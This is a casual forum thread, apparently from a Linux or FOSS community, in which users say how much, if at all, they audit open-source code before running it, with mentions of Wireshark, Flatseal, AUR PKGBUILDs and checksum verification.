Lmao. I commented about this exact shit a few days ago and people in that thread were agast that people used software without vetting. So many were so confident in the security and superiority to paid solutions.

Not really. Or only when it doesn’t do exactly what I expect.

Occasionally. Not big projects like Krita. I regularly check apps with Wireshark, most apps should be entirely offline. I also turn off internet access with flatseal.

Only when convenient and if it’s not from a reputable source. I will audit random projects on Github but I’m not fucking auditing Firefox.

Nah. I trust open source devs with all my heart. If anything goes wrong then I’ll think about it.

I’ve worked on FOSS stuff with very large user bases and seen very obvious flaws go unnoticed for several years, so I guess most people don’t.

‘Open source’ misses the point of libre software.

“I like your funny words magic man” -me when I look at code

No

Depends. I read the PKGBUILDs of all AUR packages I install at least, which is not the same as reading source code but it’s something. If it’s a very widely used piece of software I don’t bother—if all these people haven’t spotted some secret backdoor, I as a lay person am not going to be the one to spot it. I will read small things like bash scripts or in general the more “obscure” software I run will be some kind of script. But also if you’re going to publish malware in a script you’re probably obscuring the malicious function so that someone doing a preliminary read won’t spot it.

I’ve glanced over a project or two before. It’s usually less an audit, and more of a ‘what is going on in there?’ curiosity.

Though it does have the side-effect of being a low-intensity audit as well. :)

I don’t have any of the knowledge to be able to do it.

I just hope that others who do, and are interested in the app, are doing their part.

I wouldn’t say blindly, rather my heuristic is, the most long term and popular a project is, the less I’ll bother.

If I do though get a random script from a random repository, rather than from say Debian official package manager from main contrib sources, then I will check.

If it’s another repository, say Firefox from Mozilla or Blender then I won’t check but I’ll make sure it genuinely comes from there, maybe not a mirror or that the mirror does have a checksum that gets validated.

So… investment on verifying trust us is roughly proportional to how little I expect others to check.

Click file “Yup, looks like code all right”

I don’t really care about low quality code as long as its still the best tool for the job. I blindly trust that any malicious code in popular sofware would quickly be called out.

The more niche, the more likely I feel like first investigating what exactly it does before i download.

Realistically i would probably not be able to tell without consulting an llm though.

Not at all unfortunately. I’m not a programmer though.

I don’t have the fluency to detect vulnerabilities or memory leaks. I wish I did, and I’m trying to learn. Being self-taught is hard work.

But I can read bug reports and get the hint. And I check upstream sources to make sure projects are still under active development. Even occasional maintenance is better than nothing.